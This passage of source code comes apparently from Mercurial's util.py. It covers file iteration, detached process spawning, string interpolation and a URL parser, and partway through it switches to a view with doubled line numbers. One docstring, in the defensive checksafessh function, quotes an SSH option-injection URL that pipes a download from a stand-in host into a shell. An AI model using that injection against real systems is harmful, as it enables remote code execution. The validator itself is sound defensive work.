                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # incomplete trailing line: keep for next read
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return a line iterator over fp that is safe against EINTR.

        Regular on-disk files (S_ISREG) take the fast path and are
        returned as-is; pipes/sockets/ttys go through _safeiterfile.
        """
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2515
2515
def iterlines(iterator):
    """Flatten an iterable of text chunks into an iterator of lines."""
    for block in iterator:
        for ln in block.splitlines():
            yield ln
2520
2520
def expandpath(path):
    """Expand environment variables, then a leading '~', in path."""
    return os.path.expanduser(os.path.expandvars(path))
2523
2523
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    # frozen binary: report the executable actually running
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2538
2538
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # record the (pid, status) of any reaped child
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # re-test condfn() after seeing the child die to close the
            # race where the child becomes ready then exits immediately
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # restore the previous SIGCHLD disposition
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2573
2573
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # a doubled prefix replaces to the bare prefix character; work on
        # a copy so the caller's mapping is not mutated as a side effect
        mapping = mapping.copy()
        mapping[prefix_char] = prefix_char
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    # x.group() includes the prefix character; strip it to get the key
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2598
2598
def getport(port):
    """Return the port for a given network service.

    An integer (or integer-like string) is returned as is; any other
    string is resolved with socket.getservbyname().  An unknown service
    raises error.Abort.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric, fall through to the service-name lookup
        pass

    try:
        return socket.getservbyname(port)
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
2615
2615
# recognized boolean spellings; parsebool() compares case-insensitively
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
             '0': False, 'no': False, 'false': False, 'off': False,
             'never': False}

def parsebool(s):
    """Parse s into a boolean, or None when s is not a valid boolean."""
    return _booleans.get(s.lower(), None)
2626
2626
# two-hex-digit string -> corresponding character, e.g. 'ff' -> '\xff';
# covers both cases since string.hexdigits has upper and lower letters
_hextochr = {a + b: chr(int(a + b, 16))
             for a in string.hexdigits for b in string.hexdigits}
2629
2629
2630 class url(object):
2630 class url(object):
2631 r"""Reliable URL parser.
2631 r"""Reliable URL parser.
2632
2632
2633 This parses URLs and provides attributes for the following
2633 This parses URLs and provides attributes for the following
2634 components:
2634 components:
2635
2635
2636 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2636 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2637
2637
2638 Missing components are set to None. The only exception is
2638 Missing components are set to None. The only exception is
2639 fragment, which is set to '' if present but empty.
2639 fragment, which is set to '' if present but empty.
2640
2640
2641 If parsefragment is False, fragment is included in query. If
2641 If parsefragment is False, fragment is included in query. If
2642 parsequery is False, query is included in path. If both are
2642 parsequery is False, query is included in path. If both are
2643 False, both fragment and query are included in path.
2643 False, both fragment and query are included in path.
2644
2644
2645 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2645 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2646
2646
2647 Note that for backward compatibility reasons, bundle URLs do not
2647 Note that for backward compatibility reasons, bundle URLs do not
2648 take host names. That means 'bundle://../' has a path of '../'.
2648 take host names. That means 'bundle://../' has a path of '../'.
2649
2649
2650 Examples:
2650 Examples:
2651
2651
2652 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2652 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2653 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2653 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2654 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2654 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2655 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2655 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2656 >>> url(b'file:///home/joe/repo')
2656 >>> url(b'file:///home/joe/repo')
2657 <url scheme: 'file', path: '/home/joe/repo'>
2657 <url scheme: 'file', path: '/home/joe/repo'>
2658 >>> url(b'file:///c:/temp/foo/')
2658 >>> url(b'file:///c:/temp/foo/')
2659 <url scheme: 'file', path: 'c:/temp/foo/'>
2659 <url scheme: 'file', path: 'c:/temp/foo/'>
2660 >>> url(b'bundle:foo')
2660 >>> url(b'bundle:foo')
2661 <url scheme: 'bundle', path: 'foo'>
2661 <url scheme: 'bundle', path: 'foo'>
2662 >>> url(b'bundle://../foo')
2662 >>> url(b'bundle://../foo')
2663 <url scheme: 'bundle', path: '../foo'>
2663 <url scheme: 'bundle', path: '../foo'>
2664 >>> url(br'c:\foo\bar')
2664 >>> url(br'c:\foo\bar')
2665 <url path: 'c:\\foo\\bar'>
2665 <url path: 'c:\\foo\\bar'>
2666 >>> url(br'\\blah\blah\blah')
2666 >>> url(br'\\blah\blah\blah')
2667 <url path: '\\\\blah\\blah\\blah'>
2667 <url path: '\\\\blah\\blah\\blah'>
2668 >>> url(br'\\blah\blah\blah#baz')
2668 >>> url(br'\\blah\blah\blah#baz')
2669 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2669 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2670 >>> url(br'file:///C:\users\me')
2670 >>> url(br'file:///C:\users\me')
2671 <url scheme: 'file', path: 'C:\\users\\me'>
2671 <url scheme: 'file', path: 'C:\\users\\me'>
2672
2672
2673 Authentication credentials:
2673 Authentication credentials:
2674
2674
2675 >>> url(b'ssh://joe:xyz@x/repo')
2675 >>> url(b'ssh://joe:xyz@x/repo')
2676 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2676 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2677 >>> url(b'ssh://joe@x/repo')
2677 >>> url(b'ssh://joe@x/repo')
2678 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2678 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2679
2679
2680 Query strings and fragments:
2680 Query strings and fragments:
2681
2681
2682 >>> url(b'http://host/a?b#c')
2682 >>> url(b'http://host/a?b#c')
2683 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2683 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2684 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2684 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2685 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2685 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2686
2686
2687 Empty path:
2687 Empty path:
2688
2688
2689 >>> url(b'')
2689 >>> url(b'')
2690 <url path: ''>
2690 <url path: ''>
2691 >>> url(b'#a')
2691 >>> url(b'#a')
2692 <url path: '', fragment: 'a'>
2692 <url path: '', fragment: 'a'>
2693 >>> url(b'http://host/')
2693 >>> url(b'http://host/')
2694 <url scheme: 'http', host: 'host', path: ''>
2694 <url scheme: 'http', host: 'host', path: ''>
2695 >>> url(b'http://host/#a')
2695 >>> url(b'http://host/#a')
2696 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2696 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2697
2697
2698 Only scheme:
2698 Only scheme:
2699
2699
2700 >>> url(b'http:')
2700 >>> url(b'http:')
2701 <url scheme: 'http'>
2701 <url scheme: 'http'>
2702 """
2702 """
2703
2703
2704 _safechars = "!~*'()+"
2704 _safechars = "!~*'()+"
2705 _safepchars = "/!~*'()+:\\"
2705 _safepchars = "/!~*'()+:\\"
2706 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2706 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2707
2707
2708 def __init__(self, path, parsequery=True, parsefragment=True):
2708 def __init__(self, path, parsequery=True, parsefragment=True):
2709 # We slowly chomp away at path until we have only the path left
2709 # We slowly chomp away at path until we have only the path left
2710 self.scheme = self.user = self.passwd = self.host = None
2710 self.scheme = self.user = self.passwd = self.host = None
2711 self.port = self.path = self.query = self.fragment = None
2711 self.port = self.path = self.query = self.fragment = None
2712 self._localpath = True
2712 self._localpath = True
2713 self._hostport = ''
2713 self._hostport = ''
2714 self._origpath = path
2714 self._origpath = path
2715
2715
2716 if parsefragment and '#' in path:
2716 if parsefragment and '#' in path:
2717 path, self.fragment = path.split('#', 1)
2717 path, self.fragment = path.split('#', 1)
2718
2718
2719 # special case for Windows drive letters and UNC paths
2719 # special case for Windows drive letters and UNC paths
2720 if hasdriveletter(path) or path.startswith('\\\\'):
2720 if hasdriveletter(path) or path.startswith('\\\\'):
2721 self.path = path
2721 self.path = path
2722 return
2722 return
2723
2723
2724 # For compatibility reasons, we can't handle bundle paths as
2724 # For compatibility reasons, we can't handle bundle paths as
2725 # normal URLS
2725 # normal URLS
2726 if path.startswith('bundle:'):
2726 if path.startswith('bundle:'):
2727 self.scheme = 'bundle'
2727 self.scheme = 'bundle'
2728 path = path[7:]
2728 path = path[7:]
2729 if path.startswith('//'):
2729 if path.startswith('//'):
2730 path = path[2:]
2730 path = path[2:]
2731 self.path = path
2731 self.path = path
2732 return
2732 return
2733
2733
2734 if self._matchscheme(path):
2734 if self._matchscheme(path):
2735 parts = path.split(':', 1)
2735 parts = path.split(':', 1)
2736 if parts[0]:
2736 if parts[0]:
2737 self.scheme, path = parts
2737 self.scheme, path = parts
2738 self._localpath = False
2738 self._localpath = False
2739
2739
2740 if not path:
2740 if not path:
2741 path = None
2741 path = None
2742 if self._localpath:
2742 if self._localpath:
2743 self.path = ''
2743 self.path = ''
2744 return
2744 return
2745 else:
2745 else:
2746 if self._localpath:
2746 if self._localpath:
2747 self.path = path
2747 self.path = path
2748 return
2748 return
2749
2749
2750 if parsequery and '?' in path:
2750 if parsequery and '?' in path:
2751 path, self.query = path.split('?', 1)
2751 path, self.query = path.split('?', 1)
2752 if not path:
2752 if not path:
2753 path = None
2753 path = None
2754 if not self.query:
2754 if not self.query:
2755 self.query = None
2755 self.query = None
2756
2756
2757 # // is required to specify a host/authority
2757 # // is required to specify a host/authority
2758 if path and path.startswith('//'):
2758 if path and path.startswith('//'):
2759 parts = path[2:].split('/', 1)
2759 parts = path[2:].split('/', 1)
2760 if len(parts) > 1:
2760 if len(parts) > 1:
2761 self.host, path = parts
2761 self.host, path = parts
2762 else:
2762 else:
2763 self.host = parts[0]
2763 self.host = parts[0]
2764 path = None
2764 path = None
2765 if not self.host:
2765 if not self.host:
2766 self.host = None
2766 self.host = None
2767 # path of file:///d is /d
2767 # path of file:///d is /d
2768 # path of file:///d:/ is d:/, not /d:/
2768 # path of file:///d:/ is d:/, not /d:/
2769 if path and not hasdriveletter(path):
2769 if path and not hasdriveletter(path):
2770 path = '/' + path
2770 path = '/' + path
2771
2771
2772 if self.host and '@' in self.host:
2772 if self.host and '@' in self.host:
2773 self.user, self.host = self.host.rsplit('@', 1)
2773 self.user, self.host = self.host.rsplit('@', 1)
2774 if ':' in self.user:
2774 if ':' in self.user:
2775 self.user, self.passwd = self.user.split(':', 1)
2775 self.user, self.passwd = self.user.split(':', 1)
2776 if not self.host:
2776 if not self.host:
2777 self.host = None
2777 self.host = None
2778
2778
2779 # Don't split on colons in IPv6 addresses without ports
2779 # Don't split on colons in IPv6 addresses without ports
2780 if (self.host and ':' in self.host and
2780 if (self.host and ':' in self.host and
2781 not (self.host.startswith('[') and self.host.endswith(']'))):
2781 not (self.host.startswith('[') and self.host.endswith(']'))):
2782 self._hostport = self.host
2782 self._hostport = self.host
2783 self.host, self.port = self.host.rsplit(':', 1)
2783 self.host, self.port = self.host.rsplit(':', 1)
2784 if not self.host:
2784 if not self.host:
2785 self.host = None
2785 self.host = None
2786
2786
2787 if (self.host and self.scheme == 'file' and
2787 if (self.host and self.scheme == 'file' and
2788 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2788 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2789 raise Abort(_('file:// URLs can only refer to localhost'))
2789 raise Abort(_('file:// URLs can only refer to localhost'))
2790
2790
2791 self.path = path
2791 self.path = path
2792
2792
2793 # leave the query string escaped
2793 # leave the query string escaped
2794 for a in ('user', 'passwd', 'host', 'port',
2794 for a in ('user', 'passwd', 'host', 'port',
2795 'path', 'fragment'):
2795 'path', 'fragment'):
2796 v = getattr(self, a)
2796 v = getattr(self, a)
2797 if v is not None:
2797 if v is not None:
2798 setattr(self, a, urlreq.unquote(v))
2798 setattr(self, a, urlreq.unquote(v))
2799
2799
2800 @encoding.strmethod
2800 @encoding.strmethod
2801 def __repr__(self):
2801 def __repr__(self):
2802 attrs = []
2802 attrs = []
2803 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2803 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2804 'query', 'fragment'):
2804 'query', 'fragment'):
2805 v = getattr(self, a)
2805 v = getattr(self, a)
2806 if v is not None:
2806 if v is not None:
2807 attrs.append('%s: %r' % (a, v))
2807 attrs.append('%s: %r' % (a, v))
2808 return '<url %s>' % ', '.join(attrs)
2808 return '<url %s>' % ', '.join(attrs)
2809
2809
2810 def __bytes__(self):
2810 def __bytes__(self):
2811 r"""Join the URL's components back into a URL string.
2811 r"""Join the URL's components back into a URL string.
2812
2812
2813 Examples:
2813 Examples:
2814
2814
2815 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2815 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2816 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2816 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2817 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2817 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2818 'http://user:pw@host:80/?foo=bar&baz=42'
2818 'http://user:pw@host:80/?foo=bar&baz=42'
2819 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2819 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2820 'http://user:pw@host:80/?foo=bar%3dbaz'
2820 'http://user:pw@host:80/?foo=bar%3dbaz'
2821 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2821 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2822 'ssh://user:pw@[::1]:2200//home/joe#'
2822 'ssh://user:pw@[::1]:2200//home/joe#'
2823 >>> bytes(url(b'http://localhost:80//'))
2823 >>> bytes(url(b'http://localhost:80//'))
2824 'http://localhost:80//'
2824 'http://localhost:80//'
2825 >>> bytes(url(b'http://localhost:80/'))
2825 >>> bytes(url(b'http://localhost:80/'))
2826 'http://localhost:80/'
2826 'http://localhost:80/'
2827 >>> bytes(url(b'http://localhost:80'))
2827 >>> bytes(url(b'http://localhost:80'))
2828 'http://localhost:80/'
2828 'http://localhost:80/'
2829 >>> bytes(url(b'bundle:foo'))
2829 >>> bytes(url(b'bundle:foo'))
2830 'bundle:foo'
2830 'bundle:foo'
2831 >>> bytes(url(b'bundle://../foo'))
2831 >>> bytes(url(b'bundle://../foo'))
2832 'bundle:../foo'
2832 'bundle:../foo'
2833 >>> bytes(url(b'path'))
2833 >>> bytes(url(b'path'))
2834 'path'
2834 'path'
2835 >>> bytes(url(b'file:///tmp/foo/bar'))
2835 >>> bytes(url(b'file:///tmp/foo/bar'))
2836 'file:///tmp/foo/bar'
2836 'file:///tmp/foo/bar'
2837 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2837 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2838 'file:///c:/tmp/foo/bar'
2838 'file:///c:/tmp/foo/bar'
2839 >>> print(url(br'bundle:foo\bar'))
2839 >>> print(url(br'bundle:foo\bar'))
2840 bundle:foo\bar
2840 bundle:foo\bar
2841 >>> print(url(br'file:///D:\data\hg'))
2841 >>> print(url(br'file:///D:\data\hg'))
2842 file:///D:\data\hg
2842 file:///D:\data\hg
2843 """
2843 """
2844 if self._localpath:
2844 if self._localpath:
2845 s = self.path
2845 s = self.path
2846 if self.scheme == 'bundle':
2846 if self.scheme == 'bundle':
2847 s = 'bundle:' + s
2847 s = 'bundle:' + s
2848 if self.fragment:
2848 if self.fragment:
2849 s += '#' + self.fragment
2849 s += '#' + self.fragment
2850 return s
2850 return s
2851
2851
2852 s = self.scheme + ':'
2852 s = self.scheme + ':'
2853 if self.user or self.passwd or self.host:
2853 if self.user or self.passwd or self.host:
2854 s += '//'
2854 s += '//'
2855 elif self.scheme and (not self.path or self.path.startswith('/')
2855 elif self.scheme and (not self.path or self.path.startswith('/')
2856 or hasdriveletter(self.path)):
2856 or hasdriveletter(self.path)):
2857 s += '//'
2857 s += '//'
2858 if hasdriveletter(self.path):
2858 if hasdriveletter(self.path):
2859 s += '/'
2859 s += '/'
2860 if self.user:
2860 if self.user:
2861 s += urlreq.quote(self.user, safe=self._safechars)
2861 s += urlreq.quote(self.user, safe=self._safechars)
2862 if self.passwd:
2862 if self.passwd:
2863 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2863 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2864 if self.user or self.passwd:
2864 if self.user or self.passwd:
2865 s += '@'
2865 s += '@'
2866 if self.host:
2866 if self.host:
2867 if not (self.host.startswith('[') and self.host.endswith(']')):
2867 if not (self.host.startswith('[') and self.host.endswith(']')):
2868 s += urlreq.quote(self.host)
2868 s += urlreq.quote(self.host)
2869 else:
2869 else:
2870 s += self.host
2870 s += self.host
2871 if self.port:
2871 if self.port:
2872 s += ':' + urlreq.quote(self.port)
2872 s += ':' + urlreq.quote(self.port)
2873 if self.host:
2873 if self.host:
2874 s += '/'
2874 s += '/'
2875 if self.path:
2875 if self.path:
2876 # TODO: similar to the query string, we should not unescape the
2876 # TODO: similar to the query string, we should not unescape the
2877 # path when we store it, the path might contain '%2f' = '/',
2877 # path when we store it, the path might contain '%2f' = '/',
2878 # which we should *not* escape.
2878 # which we should *not* escape.
2879 s += urlreq.quote(self.path, safe=self._safepchars)
2879 s += urlreq.quote(self.path, safe=self._safepchars)
2880 if self.query:
2880 if self.query:
2881 # we store the query in escaped form.
2881 # we store the query in escaped form.
2882 s += '?' + self.query
2882 s += '?' + self.query
2883 if self.fragment is not None:
2883 if self.fragment is not None:
2884 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2884 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2885 return s
2885 return s
2886
2886
2887 __str__ = encoding.strmethod(__bytes__)
2887 __str__ = encoding.strmethod(__bytes__)
2888
2888
2889 def authinfo(self):
2889 def authinfo(self):
2890 user, passwd = self.user, self.passwd
2890 user, passwd = self.user, self.passwd
2891 try:
2891 try:
2892 self.user, self.passwd = None, None
2892 self.user, self.passwd = None, None
2893 s = bytes(self)
2893 s = bytes(self)
2894 finally:
2894 finally:
2895 self.user, self.passwd = user, passwd
2895 self.user, self.passwd = user, passwd
2896 if not self.user:
2896 if not self.user:
2897 return (s, None)
2897 return (s, None)
2898 # authinfo[1] is passed to urllib2 password manager, and its
2898 # authinfo[1] is passed to urllib2 password manager, and its
2899 # URIs must not contain credentials. The host is passed in the
2899 # URIs must not contain credentials. The host is passed in the
2900 # URIs list because Python < 2.4.3 uses only that to search for
2900 # URIs list because Python < 2.4.3 uses only that to search for
2901 # a password.
2901 # a password.
2902 return (s, (None, (s, self.host),
2902 return (s, (None, (s, self.host),
2903 self.user, self.passwd or ''))
2903 self.user, self.passwd or ''))
2904
2904
2905 def isabs(self):
2905 def isabs(self):
2906 if self.scheme and self.scheme != 'file':
2906 if self.scheme and self.scheme != 'file':
2907 return True # remote URL
2907 return True # remote URL
2908 if hasdriveletter(self.path):
2908 if hasdriveletter(self.path):
2909 return True # absolute for our purposes - can't be joined()
2909 return True # absolute for our purposes - can't be joined()
2910 if self.path.startswith(br'\\'):
2910 if self.path.startswith(br'\\'):
2911 return True # Windows UNC path
2911 return True # Windows UNC path
2912 if self.path.startswith('/'):
2912 if self.path.startswith('/'):
2913 return True # POSIX-style
2913 return True # POSIX-style
2914 return False
2914 return False
2915
2915
2916 def localpath(self):
2916 def localpath(self):
2917 if self.scheme == 'file' or self.scheme == 'bundle':
2917 if self.scheme == 'file' or self.scheme == 'bundle':
2918 path = self.path or '/'
2918 path = self.path or '/'
2919 # For Windows, we need to promote hosts containing drive
2919 # For Windows, we need to promote hosts containing drive
2920 # letters to paths with drive letters.
2920 # letters to paths with drive letters.
2921 if hasdriveletter(self._hostport):
2921 if hasdriveletter(self._hostport):
2922 path = self._hostport + '/' + self.path
2922 path = self._hostport + '/' + self.path
2923 elif (self.host is not None and self.path
2923 elif (self.host is not None and self.path
2924 and not hasdriveletter(path)):
2924 and not hasdriveletter(path)):
2925 path = '/' + path
2925 path = '/' + path
2926 return path
2926 return path
2927 return self._origpath
2927 return self._origpath
2928
2928
2929 def islocal(self):
2929 def islocal(self):
2930 '''whether localpath will return something that posixfile can open'''
2930 '''whether localpath will return something that posixfile can open'''
2931 return (not self.scheme or self.scheme == 'file'
2931 return (not self.scheme or self.scheme == 'file'
2932 or self.scheme == 'bundle')
2932 or self.scheme == 'bundle')
2933
2933
2934 def hasscheme(path):
2934 def hasscheme(path):
2935 return bool(url(path).scheme)
2935 return bool(url(path).scheme)
2936
2936
2937 def hasdriveletter(path):
2937 def hasdriveletter(path):
2938 return path and path[1:2] == ':' and path[0:1].isalpha()
2938 return path and path[1:2] == ':' and path[0:1].isalpha()
2939
2939
2940 def urllocalpath(path):
2940 def urllocalpath(path):
2941 return url(path, parsequery=False, parsefragment=False).localpath()
2941 return url(path, parsequery=False, parsefragment=False).localpath()
2942
2942
2943 def checksafessh(path):
2943 def checksafessh(path):
2944 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2944 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2945
2945
2946 This is a sanity check for ssh urls. ssh will parse the first item as
2946 This is a sanity check for ssh urls. ssh will parse the first item as
2947 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2947 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2948 Let's prevent these potentially exploited urls entirely and warn the
2948 Let's prevent these potentially exploited urls entirely and warn the
2949 user.
2949 user.
2950
2950
2951 Raises an error.Abort when the url is unsafe.
2951 Raises an error.Abort when the url is unsafe.
2952 """
2952 """
2953 path = urlreq.unquote(path)
2953 path = urlreq.unquote(path)
2954 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2954 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2955 raise error.Abort(_('potentially unsafe url: %r') %
2955 raise error.Abort(_('potentially unsafe url: %r') %
2956 (path,))
2956 (path,))
2957
2957
2958 def hidepassword(u):
2958 def hidepassword(u):
2959 '''hide user credential in a url string'''
2959 '''hide user credential in a url string'''
2960 u = url(u)
2960 u = url(u)
2961 if u.passwd:
2961 if u.passwd:
2962 u.passwd = '***'
2962 u.passwd = '***'
2963 return bytes(u)
2963 return bytes(u)
2964
2964
2965 def removeauth(u):
2965 def removeauth(u):
2966 '''remove all authentication information from a url string'''
2966 '''remove all authentication information from a url string'''
2967 u = url(u)
2967 u = url(u)
2968 u.user = u.passwd = None
2968 u.user = u.passwd = None
2969 return str(u)
2969 return str(u)
2970
2970
2971 timecount = unitcountfn(
2971 timecount = unitcountfn(
2972 (1, 1e3, _('%.0f s')),
2972 (1, 1e3, _('%.0f s')),
2973 (100, 1, _('%.1f s')),
2973 (100, 1, _('%.1f s')),
2974 (10, 1, _('%.2f s')),
2974 (10, 1, _('%.2f s')),
2975 (1, 1, _('%.3f s')),
2975 (1, 1, _('%.3f s')),
2976 (100, 0.001, _('%.1f ms')),
2976 (100, 0.001, _('%.1f ms')),
2977 (10, 0.001, _('%.2f ms')),
2977 (10, 0.001, _('%.2f ms')),
2978 (1, 0.001, _('%.3f ms')),
2978 (1, 0.001, _('%.3f ms')),
2979 (100, 0.000001, _('%.1f us')),
2979 (100, 0.000001, _('%.1f us')),
2980 (10, 0.000001, _('%.2f us')),
2980 (10, 0.000001, _('%.2f us')),
2981 (1, 0.000001, _('%.3f us')),
2981 (1, 0.000001, _('%.3f us')),
2982 (100, 0.000000001, _('%.1f ns')),
2982 (100, 0.000000001, _('%.1f ns')),
2983 (10, 0.000000001, _('%.2f ns')),
2983 (10, 0.000000001, _('%.2f ns')),
2984 (1, 0.000000001, _('%.3f ns')),
2984 (1, 0.000000001, _('%.3f ns')),
2985 )
2985 )
2986
2986
2987 _timenesting = [0]
2987 _timenesting = [0]
2988
2988
2989 def timed(func):
2989 def timed(func):
2990 '''Report the execution time of a function call to stderr.
2990 '''Report the execution time of a function call to stderr.
2991
2991
2992 During development, use as a decorator when you need to measure
2992 During development, use as a decorator when you need to measure
2993 the cost of a function, e.g. as follows:
2993 the cost of a function, e.g. as follows:
2994
2994
2995 @util.timed
2995 @util.timed
2996 def foo(a, b, c):
2996 def foo(a, b, c):
2997 pass
2997 pass
2998 '''
2998 '''
2999
2999
3000 def wrapper(*args, **kwargs):
3000 def wrapper(*args, **kwargs):
3001 start = timer()
3001 start = timer()
3002 indent = 2
3002 indent = 2
3003 _timenesting[0] += indent
3003 _timenesting[0] += indent
3004 try:
3004 try:
3005 return func(*args, **kwargs)
3005 return func(*args, **kwargs)
3006 finally:
3006 finally:
3007 elapsed = timer() - start
3007 elapsed = timer() - start
3008 _timenesting[0] -= indent
3008 _timenesting[0] -= indent
3009 stderr.write('%s%s: %s\n' %
3009 stderr.write('%s%s: %s\n' %
3010 (' ' * _timenesting[0], func.__name__,
3010 (' ' * _timenesting[0], func.__name__,
3011 timecount(elapsed)))
3011 timecount(elapsed)))
3012 return wrapper
3012 return wrapper
3013
3013
3014 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3014 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3015 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3015 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3016
3016
3017 def sizetoint(s):
3017 def sizetoint(s):
3018 '''Convert a space specifier to a byte count.
3018 '''Convert a space specifier to a byte count.
3019
3019
3020 >>> sizetoint(b'30')
3020 >>> sizetoint(b'30')
3021 30
3021 30
3022 >>> sizetoint(b'2.2kb')
3022 >>> sizetoint(b'2.2kb')
3023 2252
3023 2252
3024 >>> sizetoint(b'6M')
3024 >>> sizetoint(b'6M')
3025 6291456
3025 6291456
3026 '''
3026 '''
3027 t = s.strip().lower()
3027 t = s.strip().lower()
3028 try:
3028 try:
3029 for k, u in _sizeunits:
3029 for k, u in _sizeunits:
3030 if t.endswith(k):
3030 if t.endswith(k):
3031 return int(float(t[:-len(k)]) * u)
3031 return int(float(t[:-len(k)]) * u)
3032 return int(t)
3032 return int(t)
3033 except ValueError:
3033 except ValueError:
3034 raise error.ParseError(_("couldn't parse size: %s") % s)
3034 raise error.ParseError(_("couldn't parse size: %s") % s)
3035
3035
3036 class hooks(object):
3036 class hooks(object):
3037 '''A collection of hook functions that can be used to extend a
3037 '''A collection of hook functions that can be used to extend a
3038 function's behavior. Hooks are called in lexicographic order,
3038 function's behavior. Hooks are called in lexicographic order,
3039 based on the names of their sources.'''
3039 based on the names of their sources.'''
3040
3040
3041 def __init__(self):
3041 def __init__(self):
3042 self._hooks = []
3042 self._hooks = []
3043
3043
3044 def add(self, source, hook):
3044 def add(self, source, hook):
3045 self._hooks.append((source, hook))
3045 self._hooks.append((source, hook))
3046
3046
3047 def __call__(self, *args):
